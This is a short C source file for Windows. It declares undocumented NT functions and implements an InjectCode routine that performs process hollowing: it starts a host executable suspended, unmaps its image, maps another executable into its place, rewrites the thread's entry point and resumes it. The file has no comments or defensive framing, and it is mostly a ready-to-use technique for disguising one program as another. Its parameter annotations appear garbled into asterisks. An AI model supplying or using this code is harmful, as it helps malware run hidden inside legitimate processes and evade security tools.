#include <windows.h>
#include <winternl.h>
NTSTATUS
NTAPI
NtCreateSection(
*Out* PHANDLE SectionHandle,
*In* ACCESS_MASK DesiredAccess,
*In*opt_ POBJECT_ATTRIBUTES ObjectAttributes,
*In*opt_ PLARGE_INTEGER MaximumSize,
*In* ULONG SectionPageProtection,
*In* ULONG AllocationAttributes,
*In*opt_ HANDLE FileHandle
);
typedef enum *SECTION*INHERIT {
ViewShare = 1,
ViewUnmap = 2
} SECTION_INHERIT;
NTSTATUS
NTAPI
NtMapViewOfSection(
*In* HANDLE SectionHandle,
*In* HANDLE ProcessHandle,
*Inout* *At*(*BaseAddress, *Readable*bytes_(*ViewSize) *Writable*bytes_(*ViewSize) *Post*readable_byte_size_(*ViewSize)) PVOID *BaseAddress,
*In* ULONG_PTR ZeroBits,
*In* SIZE_T CommitSize,
*Inout*opt_ PLARGE_INTEGER SectionOffset,
*Inout* PSIZE_T ViewSize,
*In* SECTION_INHERIT InheritDisposition,
*In* ULONG AllocationType,
*In* ULONG Win32Protect
);
NTSTATUS
NTAPI
NtUnmapViewOfSection(
*In* HANDLE ProcessHandle,
*In* PVOID BaseAddress
);
NTSTATUS
NTAPI
NtResumeProcess(
*In* HANDLE ProcessHandle
);
void InjectCode(LPCWSTR szHostExe, LPCWSTR szInjectedFile) {
HANDLE hf_host = NULL;
HANDLE hsec_host = NULL;
HANDLE hf_injected = NULL;
HANDLE hsec_injected = NULL;
PVOID pb_injected = NULL;
SIZE_T sz_injected = 0;
PIMAGE_NT_HEADERS nthdr_injected = NULL;
hf_host = CreateFileW(szHostExe, GENERIC_READ | GENERIC_EXECUTE, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
NtCreateSection(&hsec_host, SECTION_ALL_ACCESS, NULL, NULL, PAGE_EXECUTE_WRITECOPY, SEC_IMAGE, hf_host);
hf_injected = CreateFileW(szInjectedFile, GENERIC_READ | GENERIC_EXECUTE, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
NtCreateSection(&hsec_injected, SECTION_ALL_ACCESS, NULL, NULL, PAGE_EXECUTE_WRITECOPY, SEC_IMAGE, hf_injected);
NtMapViewOfSection(hsec_injected, GetCurrentProcess(), &pb_injected, 0, 0, NULL, &sz_injected, ViewUnmap, 0, PAGE_EXECUTE_WRITECOPY);
nthdr_injected = (PIMAGE_NT_HEADERS)((PBYTE)pb_injected + ((PIMAGE_DOS_HEADER)pb_injected)->e_lfanew);
PROCESS_INFORMATION pi;
STARTUPINFOW si = { sizeof(STARTUPINFO) };
CreateProcessW(szHostExe, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
CONTEXT context = { .ContextFlags = CONTEXT_INTEGER };
GetThreadContext(pi.hThread, &context);
PPEB peb = (PPEB)context.Ebx;
PVOID image_base;
ReadProcessMemory(pi.hProcess, (PBYTE)(&peb->Ldr) - sizeof(PVOID), &image_base, sizeof(PVOID), NULL);
NtUnmapViewOfSection(pi.hProcess, image_base);
NtMapViewOfSection(hsec_injected, pi.hProcess, &image_base, 0, 0, NULL, &sz_injected, ViewUnmap, 0, PAGE_EXECUTE_WRITECOPY);
context.Eax = (DWORD)((PBYTE)image_base + nthdr_injected->OptionalHeader.AddressOfEntryPoint);
SetThreadContext(pi.hThread, &context);
NtResumeProcess(pi.hProcess);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
NtClose(hsec_injected);
CloseHandle(hf_injected);
NtClose(hsec_host);
CloseHandle(hf_host);
}